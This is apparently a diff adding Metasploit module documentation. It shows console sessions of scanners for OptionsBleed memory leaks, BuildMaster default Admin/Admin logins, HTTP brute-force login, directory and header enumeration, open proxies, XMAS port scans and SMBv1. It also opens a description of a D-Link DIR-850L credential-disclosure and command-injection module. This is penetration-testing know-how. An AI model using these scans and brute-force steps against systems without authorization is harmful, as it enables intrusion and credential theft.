[+] Request 22: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,<2C><><01>~,<2C>T<01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,POST
|
||||||
|
[+] Request 23: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,,HEAD,<2C>4<01>~,<2C><><01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,POST
|
||||||
|
[+] Request 24: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
|
||||||
|
[+] Request 25: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C>T<01>~,<2C><><01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,POST
|
||||||
|
[+] Request 26: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
|
||||||
|
[+] Request 27: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,<2C>4<01>~,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 28: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,allow,HEAD,POST
|
||||||
|
[+] Request 29: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 30: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>4<01>~,8<>)<01>~,HEAD,POST
|
||||||
|
[+] Request 31: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C><><01>~,<2C>T<01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,POST
|
||||||
|
[+] Request 32: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,,HEAD,<2C>4<01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,POST
|
||||||
|
[+] Request 33: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,<2C><><01>~,<2C><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 34: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,<2C>4<01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 35: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C><><01>~,<2C><><01>~,<2C><><01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,,HEAD,POST
|
||||||
|
[+] Request 36: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C>4<01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 38: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,POST
|
||||||
|
[+] Request 39: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,<2C><><01>~,<2C><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,POST
|
||||||
|
[+] Request 40: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,POST
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
|
||||||
|
## Cleanup
|
||||||
|
|
||||||
|
If the server is NOT vulnerable, the apache error logs will contain an entry similar to this:
|
||||||
|
|
||||||
|
```
|
||||||
|
[Wed Sep 27 19:54:43.183978 2017] [core:alert] [pid 17659] [client 2.2.2.2:43546] /var/www/html/s1/.htaccess: Could not register method 'method0' for <Limit from .htaccess configuration, referer: http://1.1.1.1/
|
||||||
|
```
|
|
@ -0,0 +1,59 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
|
||||||
|
The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
|
||||||
|
|
||||||
|
[Inedo website](http://inedo.com/)
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/buildmaster_login```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: Set credentials
|
||||||
|
5. Do: ```run```
|
||||||
|
6. You should see the module attempting to log in.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Attempt to login with the default credentials.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/buildmaster_login
|
||||||
|
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
|
||||||
|
RHOSTS => 10.0.0.39
|
||||||
|
msf auxiliary(buildmaster_login) > run
|
||||||
|
|
||||||
|
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
|
||||||
|
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
|
||||||
|
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(buildmaster_login) >
|
||||||
|
```
|
||||||
|
|
||||||
|
### Brute force with credentials from file.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/buildmaster_login
|
||||||
|
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
|
||||||
|
RHOSTS => 10.0.0.39
|
||||||
|
msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
|
||||||
|
USERPASS_FILE => ~/BuildMasterCreds.txt
|
||||||
|
msf auxiliary(buildmaster_login) > run
|
||||||
|
|
||||||
|
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
|
||||||
|
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test"
|
||||||
|
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test"
|
||||||
|
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong"
|
||||||
|
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong"
|
||||||
|
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
|
||||||
|
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(buildmaster_login) >
|
||||||
|
```
|
|
@ -0,0 +1,72 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module identifies the existence of interesting files in a given directory path.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/files_dir```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
**Running the scanner**
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/files_dir
|
||||||
|
msf auxiliary(files_dir) > show options
|
||||||
|
|
||||||
|
Module options (auxiliary/scanner/http/files_dir):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
DICTIONARY /root/Framework/msf/metasploit-framework/data/wmap/wmap_files.txt no Path of word dictionary to use
|
||||||
|
EXT no Append file extension to use
|
||||||
|
PATH / yes The path to identify files
|
||||||
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||||
|
RHOSTS yes The target address range or CIDR identifier
|
||||||
|
RPORT 80 yes The target port (TCP)
|
||||||
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||||
|
THREADS 1 yes The number of concurrent threads
|
||||||
|
VHOST no HTTP server virtual host
|
||||||
|
|
||||||
|
msf auxiliary(files_dir) > set RHOSTS 192.168.0.155
|
||||||
|
RHOSTS => 192.168.0.155
|
||||||
|
msf auxiliary(files_dir) > run
|
||||||
|
|
||||||
|
[*] Using code '404' as not found for files with extension .null
|
||||||
|
[*] Using code '404' as not found for files with extension .backup
|
||||||
|
[*] Using code '404' as not found for files with extension .bak
|
||||||
|
[*] Using code '404' as not found for files with extension .c
|
||||||
|
[*] Using code '404' as not found for files with extension .cfg
|
||||||
|
[*] Using code '404' as not found for files with extension .class
|
||||||
|
[*] Using code '404' as not found for files with extension .copy
|
||||||
|
[*] Using code '404' as not found for files with extension .conf
|
||||||
|
[*] Using code '404' as not found for files with extension .exe
|
||||||
|
[*] Using code '404' as not found for files with extension .html
|
||||||
|
[*] Found http://192.168.0.155:80/index.html 200
|
||||||
|
[*] Using code '404' as not found for files with extension .htm
|
||||||
|
[*] Using code '404' as not found for files with extension .ini
|
||||||
|
[*] Using code '404' as not found for files with extension .log
|
||||||
|
[*] Using code '404' as not found for files with extension .old
|
||||||
|
[*] Using code '404' as not found for files with extension .orig
|
||||||
|
[*] Using code '404' as not found for files with extension .php
|
||||||
|
[*] Using code '404' as not found for files with extension .tar
|
||||||
|
[*] Using code '404' as not found for files with extension .tar.gz
|
||||||
|
[*] Using code '404' as not found for files with extension .tgz
|
||||||
|
[*] Using code '404' as not found for files with extension .tmp
|
||||||
|
[*] Using code '404' as not found for files with extension .temp
|
||||||
|
[*] Using code '404' as not found for files with extension .txt
|
||||||
|
[*] Using code '404' as not found for files with extension .zip
|
||||||
|
[*] Using code '404' as not found for files with extension ~
|
||||||
|
[*] Using code '404' as not found for files with extension
|
||||||
|
[*] Found http://192.168.0.155:80/blog 301
|
||||||
|
[*] Found http://192.168.0.155:80/index 200
|
||||||
|
[*] Using code '404' as not found for files with extension
|
||||||
|
[*] Found http://192.168.0.155:80/blog 301
|
||||||
|
[*] Found http://192.168.0.155:80/index 200
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(files_dir) >
|
||||||
|
```
|
|
@ -0,0 +1,46 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module shows HTTP Headers returned by the scanned systems.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/http_header```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
**Running the scanner**
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/http_header
|
||||||
|
msf auxiliary(http_header) > show options
|
||||||
|
|
||||||
|
Module options (auxiliary/scanner/http/http_header):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
HTTP_METHOD HEAD yes HTTP Method to use, HEAD or GET (Accepted: GET, HEAD)
|
||||||
|
IGN_HEADER Vary,Date,Content-Length,Connection,Etag,Expires,Pragma,Accept-Ranges yes List of headers to ignore, seperated by comma
|
||||||
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||||
|
RHOSTS yes The target address range or CIDR identifier
|
||||||
|
RPORT 80 yes The target port (TCP)
|
||||||
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||||
|
TARGETURI / yes The URI to use
|
||||||
|
THREADS 1 yes The number of concurrent threads
|
||||||
|
VHOST no HTTP server virtual host
|
||||||
|
|
||||||
|
msf auxiliary(http_header) > set RHOSTS 192.168.56.101
|
||||||
|
RHOSTS => 192.168.56.101
|
||||||
|
msf auxiliary(http_header) > run
|
||||||
|
|
||||||
|
[+] 192.168.56.101:80 : CONTENT-TYPE: text/html
|
||||||
|
[+] 192.168.56.101:80 : SERVER: Apache/2.2.8 (Ubuntu) DAV/2
|
||||||
|
[+] 192.168.56.101:80 : X-POWERED-BY: PHP/5.2.4-2ubuntu5.10
|
||||||
|
[+] 192.168.56.101:80 : detected 3 headers
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(http_header) >
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,72 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module is a brute-force login scanner that attempts to authenticate to a system using HTTP authentication.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/http_login```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
**Running the scanner**
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/http_login
|
||||||
|
msf auxiliary(http_login) > show options
|
||||||
|
|
||||||
|
Module options (auxiliary/scanner/http/http_login):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
AUTH_URI no The URI to authenticate against (default:auto)
|
||||||
|
BLANK_PASSWORDS false no Try blank passwords for all users
|
||||||
|
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
|
||||||
|
DB_ALL_CREDS false no Try each user/password couple stored in the current database
|
||||||
|
DB_ALL_PASS false no Add all passwords in the current database to the list
|
||||||
|
DB_ALL_USERS false no Add all users in the current database to the list
|
||||||
|
PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line
|
||||||
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||||
|
REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)
|
||||||
|
RHOSTS yes The target address range or CIDR identifier
|
||||||
|
RPORT 80 yes The target port (TCP)
|
||||||
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||||
|
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
|
||||||
|
THREADS 1 yes The number of concurrent threads
|
||||||
|
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line
|
||||||
|
USER_AS_PASS false no Try the username as the password for all users
|
||||||
|
USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line
|
||||||
|
VERBOSE true yes Whether to print output for all attempts
|
||||||
|
VHOST
|
||||||
|
msf auxiliary(http_login) > set AUTH_URI /xampp/
|
||||||
|
AUTH_URI => /xampp/
|
||||||
|
msf auxiliary(http_login) > set RHOSTS 192.168.1.201
|
||||||
|
RHOSTS => 192.168.1.201
|
||||||
|
msf auxiliary(http_login) > set VERBOSE false
|
||||||
|
VERBOSE => false
|
||||||
|
msf auxiliary(http_login) > run
|
||||||
|
|
||||||
|
[*] Attempting to login to http://192.168.1.201:80/xampp/ with Basic authentication
|
||||||
|
[+] http://192.168.1.201:80/xampp/ - Successful login 'admin' : 's3cr3t'
|
||||||
|
[*] http://192.168.1.201:80/xampp/ - Random usernames are not allowed.
|
||||||
|
[*] http://192.168.1.201:80/xampp/ - Random passwords are not allowed.
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(http_login) >
|
||||||
|
```
|
||||||
|
|
||||||
|
**Checking the credentials stored**
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(http_login) > creds
|
||||||
|
Credentials
|
||||||
|
===========
|
||||||
|
|
||||||
|
host origin service public private realm private_type
|
||||||
|
---- ------ ------- ------ ------- ----- ------------
|
||||||
|
192.168.1.201 192.168.1.201 80/tcp (http) admin s3cr3t Password
|
||||||
|
|
||||||
|
msf auxiliary(http_login) >
|
||||||
|
```
|
|
@ -0,0 +1,40 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module displays the version information about each system.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/http_version```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
**Running the scanner**
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/http_version
|
||||||
|
msf auxiliary(http_version) > show options
|
||||||
|
|
||||||
|
Module options (auxiliary/scanner/http/http_version):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||||
|
RHOSTS yes The target address range or CIDR identifier
|
||||||
|
RPORT 80 yes The target port (TCP)
|
||||||
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||||
|
THREADS 1 yes The number of concurrent threads
|
||||||
|
VHOST no HTTP server virtual host
|
||||||
|
|
||||||
|
msf auxiliary(http_version) > set RHOSTS 192.168.56.101
|
||||||
|
RHOSTS => 192.168.56.101
|
||||||
|
msf auxiliary(http_version) > run
|
||||||
|
|
||||||
|
[+] 192.168.56.101:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
|
||||||
|
msf auxiliary(http_version) >
|
||||||
|
```
|
|
@ -0,0 +1,52 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Checks if an HTTP proxy is open. False positives are avoided by verifying the HTTP return code and matching a pattern. The CONNECT method is verified only by the return code. HTTP headers are shown regarding the use of proxies or load balancers.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/open_proxy```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Running the scanner :
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/http/open_proxy
|
||||||
|
msf auxiliary(open_proxy) > show options
|
||||||
|
|
||||||
|
Module options (auxiliary/scanner/http/open_proxy):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
CHECKURL http://www.google.com yes The web site to test via alleged web proxy
|
||||||
|
MULTIPORTS false no Multiple ports will be used: 80, 443, 1080, 3128, 8000, 8080, 8123
|
||||||
|
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||||
|
RHOSTS yes The target address range or CIDR identifier
|
||||||
|
RPORT 8080 yes The target port (TCP)
|
||||||
|
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||||
|
THREADS 1 yes The number of concurrent threads
|
||||||
|
VALIDCODES 200,302 yes Valid HTTP code for a successfully request
|
||||||
|
VALIDPATTERN <TITLE>302 Moved</TITLE> yes Valid pattern match (case-sensitive into the headers and HTML body) for a successfully request
|
||||||
|
VERIFYCONNECT false no Enable CONNECT HTTP method check
|
||||||
|
VHOST no HTTP server virtual host
|
||||||
|
|
||||||
|
msf auxiliary(open_proxy) > set RHOSTS 192.168.1.200-210
|
||||||
|
RHOSTS => 192.168.1.200-210
|
||||||
|
msf auxiliary(open_proxy) > set RPORT 8888
|
||||||
|
RPORT => 8888
|
||||||
|
msf auxiliary(open_proxy) > set THREADS 11
|
||||||
|
THREADS => 11
|
||||||
|
msf auxiliary(open_proxy) > run
|
||||||
|
|
||||||
|
[*] 192.168.1.201:8888 is a potentially OPEN proxy [200] (n/a)
|
||||||
|
[*] Scanned 02 of 11 hosts (018% complete)
|
||||||
|
[*] Scanned 03 of 11 hosts (027% complete)
|
||||||
|
[*] Scanned 04 of 11 hosts (036% complete)
|
||||||
|
[*] Scanned 05 of 11 hosts (045% complete)
|
||||||
|
[*] Scanned 11 of 11 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(open_proxy) >
|
||||||
|
```
|
|
@ -0,0 +1,91 @@
|
||||||
|
# Description
|
||||||
|
|
||||||
|
This module is used to determine if the ports on target machine are closed. It sends probes containing the FIN, PSH and URG flags. Scan is faster and stealthier compared to some other scans. Following action are performed depending on the state of ports -
|
||||||
|
|
||||||
|
#### OPEN|FILTERED Port:
|
||||||
|
Detects open|filtered port via no response to the segment
|
||||||
|
|
||||||
|
#### Closed Port:
|
||||||
|
Detects a closed port via a RST received in response to the FIN
|
||||||
|
|
||||||
|
# Required Permissions
|
||||||
|
|
||||||
|
XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
|
||||||
|
systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
|
||||||
|
|
||||||
|
# Options
|
||||||
|
|
||||||
|
**PORTS**
|
||||||
|
|
||||||
|
This is the list of TCP ports to test on each host.
|
||||||
|
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
|
||||||
|
options is to scan `1-10000` ports.
|
||||||
|
|
||||||
|
**Timeout**
|
||||||
|
|
||||||
|
This options states the reply read timeout in milliseconds. Default value if `500`.
|
||||||
|
|
||||||
|
**RHOSTS**
|
||||||
|
|
||||||
|
The target address range is defined in this option.
|
||||||
|
|
||||||
|
**VERBOSE**
|
||||||
|
|
||||||
|
Gives detailed message about the scan of all the ports. It also shows the
|
||||||
|
ports that were not open/filtered.
|
||||||
|
|
||||||
|
# Verification Steps
|
||||||
|
|
||||||
|
1. Do: `use auxiliary/scanner/portscan/xmas`
|
||||||
|
2. Do: `set RHOSTS [IP]`
|
||||||
|
3. Do: `set PORTS [PORTS]`
|
||||||
|
4. Do: `run`
|
||||||
|
5. The open/filtered ports will be discovered, status will be printed indicating as such.
|
||||||
|
|
||||||
|
# Scenarios
|
||||||
|
|
||||||
|
### Metaspliotable 2
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/portscan/xmas
|
||||||
|
msf auxiliary(xmas) > set rhosts 192.168.45.159
|
||||||
|
rhosts => 192.168.45.159
|
||||||
|
msf auxiliary(xmas) > set ports 1-100
|
||||||
|
ports => 1-100
|
||||||
|
msf auxiliary(xmas) > run
|
||||||
|
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:1
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:3
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:5
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:8
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:12
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:14
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:16
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:19
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:21
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:37
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:39
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:41
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:43
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:49
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:52
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:53
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:55
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:57
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:59
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:61
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:63
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:65
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:67
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:69
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:73
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:89
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:91
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:93
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:95
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:97
|
||||||
|
[*] TCP OPEN|FILTERED 192.168.45.159:99
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,55 @@
|
||||||
|
# Description
|
||||||
|
This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
|
||||||
|
```PC NETWORK PROGRAM 1.0
|
||||||
|
LANMAN1.0
|
||||||
|
Windows for Workgroups 3.1a
|
||||||
|
LM1.2X002
|
||||||
|
LANMAN2.1
|
||||||
|
NT LM 0.12
|
||||||
|
```
|
||||||
|
If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
|
||||||
|
If the SMB server does not support SMBv1 a RST will be sent.
|
||||||
|
|
||||||
|
___
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
|
||||||
|
|
||||||
|
#### A host that does support SMBv1.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
|
||||||
|
msf auxiliary(smb1) > set RHOSTS x.x.x.x
|
||||||
|
RHOSTS => x.x.x.x
|
||||||
|
msf auxiliary(smb1) > run
|
||||||
|
|
||||||
|
[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect.
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(smb1) > services -S x.x.x.x
|
||||||
|
|
||||||
|
Services
|
||||||
|
========
|
||||||
|
|
||||||
|
host port proto name state info
|
||||||
|
---- ---- ----- ---- ----- ----
|
||||||
|
x.x.x.x 445 tcp smb1 open
|
||||||
|
```
|
||||||
|
|
||||||
|
#### A host that does not support SMBv1
|
||||||
|
|
||||||
|
```
|
||||||
|
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
|
||||||
|
msf auxiliary(smb1) > set RHOSTS y.y.y.y
|
||||||
|
RHOSTS => y.y.y.y
|
||||||
|
msf auxiliary(smb1) > run
|
||||||
|
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
___
|
||||||
|
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```.
|
|
@ -0,0 +1,64 @@
|
||||||
|
The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection
|
||||||
|
vulnerability. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07
|
||||||
|
are potentially vulnerable. The vulnerability seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop.
|
||||||
|
|
||||||
|
## Vulnerable Application
|
||||||
|
|
